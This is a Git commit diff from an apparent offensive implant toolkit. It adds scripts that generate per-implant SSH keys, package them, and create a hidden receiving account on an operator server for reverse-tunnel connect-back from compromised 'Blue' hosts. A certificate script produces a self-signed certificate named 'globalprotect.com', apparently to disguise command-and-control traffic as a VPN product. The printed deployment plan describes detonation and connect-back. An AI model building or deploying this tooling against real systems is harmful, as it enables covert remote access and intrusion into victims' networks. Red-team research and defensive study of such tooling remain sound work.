Install scripts, automation

dsnezhkov · Apr 5, 2019 · 22ca8a4 · 22ca8a4
1 parent 3f753e4
commit 22ca8a4
Show file tree

Hide file tree

Showing 5 changed files with 96 additions and 46 deletions.
diff --git a/conf/build.profile b/conf/build.profile
@@ -76,6 +76,8 @@ SSHServerPort=222
 
 # OS account with the private key the implant has to connect to the SSH server with
 # see gen_ssh_user.sh
+# TODO: Randomize the user
+
 SSHServerUser=4fa48c653682c3b04add14f434a3114
 
 # Implant ID

diff --git a/infra/gen_ssh_user.sh b/infra/gen_ssh_user.sh
diff --git a/infra/gencert.sh b/infra/gencert.sh
@@ -1,2 +1,11 @@
-#!/bin/bash
-openssl req -x509 -nodes -newkey rsa:2048 -keyout sslkey.pem -out sslcert.pem -days 365 -subj "/C=GB/ST=London/L=London/O=Global Security/OU=IT Department/CN=example.com"
+#!/usr/bin/env bash
+
+DBASE="/opt/sshorty"
+DKEYS="${DBASE}/keys"
+
+echo "[+] Generating SSL Keys"
+openssl req -x509 -nodes -newkey rsa:2048 \
+        -keyout ${DKEYS}/server.key \
+        -out ${DKEYS}/server.crt -days 365  \
+        -subj "/C=GB/ST=London/L=London/O=Global Security/OU=IT Department/CN=globalprotect.com"
+
diff --git a/tools/build.sh → tools/build_implant.sh b/tools/build.sh → tools/build_implant.sh
@@ -38,7 +38,7 @@ printf "%s\n\n" "------------------------------------"
 echo "[*] Building Keys For ${ImplantID} "
 
 go run ${TOOL_DIR}/keygen.go \
-       -bits 4096  -pass ${SSHServerUserKeyPassphrase} \
+       -bits ${SSHServerUserKeyBits}  -pass ${SSHServerUserKeyPassphrase} \
        -pkfile ${SSHServerUserKeyFile}.pk \
        -pkfile-b64 ${SSHServerUserKeyFile}.bpk \
        -pubfile ${SSHServerUserKeyFile}.pub
@@ -138,6 +138,13 @@ cat<<END | tee ${OUT_DIR}/${ImplantID}.info
 END
 
 printf "%s\n\n" "-------------- END INFO----------------"
+echo "[*] Packaging ${ImplantID} for infrastructure deployment "
+
+# pushd/popd not always available
+cd  ${OUT_DIR}
+tar -cvzf ${ImplantID}.tar.gz ./${ImplantID}.{pk,bpk,pub}
+cd -
+
 printf "\n\n%s\n\n" "**********************************************"
 echo "Based on your build profile you can expect the following Deployment Plan"
 printf "%s\n\n" "**********************************************"
@@ -149,7 +156,9 @@ A. If you have chosen to fetch armored SSH key from external Yellow/Red hosting,
 
 B.You will need to create user ${SSHServerUser} on SSH server where you want Implant to terminate the reverse tunnel on Red network. Refer to scripts in infra directory. SSH keys for the would be user are pregenerated:  ${SSHServerUserKeyFile}.pk and  ${SSHServerUserKeyFile}.pub. You need to place them in .ssh directory as per usual SSH access setup (mind the permissions on keys and .ssh directory)
 
-C. You will need to stand up an WSS unwrap service on Yellow/Red side. Refer to scripts in infra directory or documentation.
+ A/B Note: For your convenience we have created a package ${OUT_DIR}/${ImplantID}.tar.gz containing SSH Keys (${ImplantID}.{pk,bpk,pub}). You can use tools/install_implant.sh to automate the steps.
+
+C. You will need to stand up an WSS unwrap service on Yellow/Red side. Refer to infra/wss2ssh_tun.sh script to help you with that.
 END
 
 printf "\n%s\n" "### PHASE III: Blue Detonation and Connect back ###"

diff --git a/tools/install_implant.sh b/tools/install_implant.sh
@@ -0,0 +1,72 @@
+#!/bin/bash
+
+#
+#
+# Build assumes Linux infra
+#
+#
+#
+usage(){
+   echo "$0 /path/<implant>.tar.gz"
+   exit 1
+}
+
+AGENT_PKG=""
+AGENTID=""
+AHOME_DIR="/tmp/"
+
+if [[ $# -ne 1 ]]
+then
+   usage
+fi
+
+if [[ -f $1 ]]
+then
+   AGENT_PKG=$1
+   _t=$(/usr/bin/basename -- "${AGENT_PKG}")
+   AGENTID="${_t%.*.*}"
+else 
+	usage
+fi
+
+echo "[+] Checking if ${AGENTID} OS account is available"
+/usr/bin/getent passwd $AGENTID >/dev/null
+
+if [[ $? -eq 0 ]]
+then
+   echo "User account is already present. Investigate. Halting"
+   exit 3
+fi
+
+echo "[+] Creating ${AGENTID} OS account"
+AHOME="${AHOME_DIR}/${AGENTID}"
+
+/usr/sbin/useradd  -c ${AGENTID} -d ${AHOME} -m -N -s /bin/false ${AGENTID} \
+	-p $(dd if=/dev/urandom bs=1024 count=1 status=none | shasum | cut -c 1-31) # Throwaway password
+
+if [[ -d ${AHOME} ]]
+then
+    cd  ${AHOME}
+	echo "[+] Setting up ${AGENTID} HOME"
+	chmod 700 ${AHOME} 
+	mkdir ${AHOME}/.ssh && chown ${AGENTID} ${AHOME}/.ssh && chmod 700 ${AHOME}/.ssh
+
+	echo "[+] Unpacking SSH Keys from ${AGENTID}.tar.gz"
+    /bin/tar -xvzf ${AGENT_PKG} -C  ${AHOME}/.ssh
+
+	echo "[+] Setting ${AGENTID} SSH keys"
+	chown ${AGENTID} ${AHOME}/.ssh/${AGENTID}.{pk,pub,bpk} && chmod 600 ${AHOME}/.ssh/${AGENTID}.{pk,pub,bpk}
+
+	echo "[+] Adding PUBLIC Key ${AHOME}/.ssh/${AGENTID} to Agent's Authorized keys file"
+	cat ${AHOME}/.ssh/${AGENTID}.pub >> ${AHOME}/.ssh/authorized_keys 
+
+	echo "[+] Currently, content of ${AGENTID} 's HOME: "
+	ls -ld ${AHOME}
+	ls -ld ${AHOME}/.ssh
+	ls -l ${AHOME}/.ssh/*
+
+    cd -
+	echo "[!!!] If not embedding PK into implant, host armored PK: ${AHOME}/.ssh/${AGENTID}.bpk "
+else
+	echo "No ${AHOME} found ?"
+fi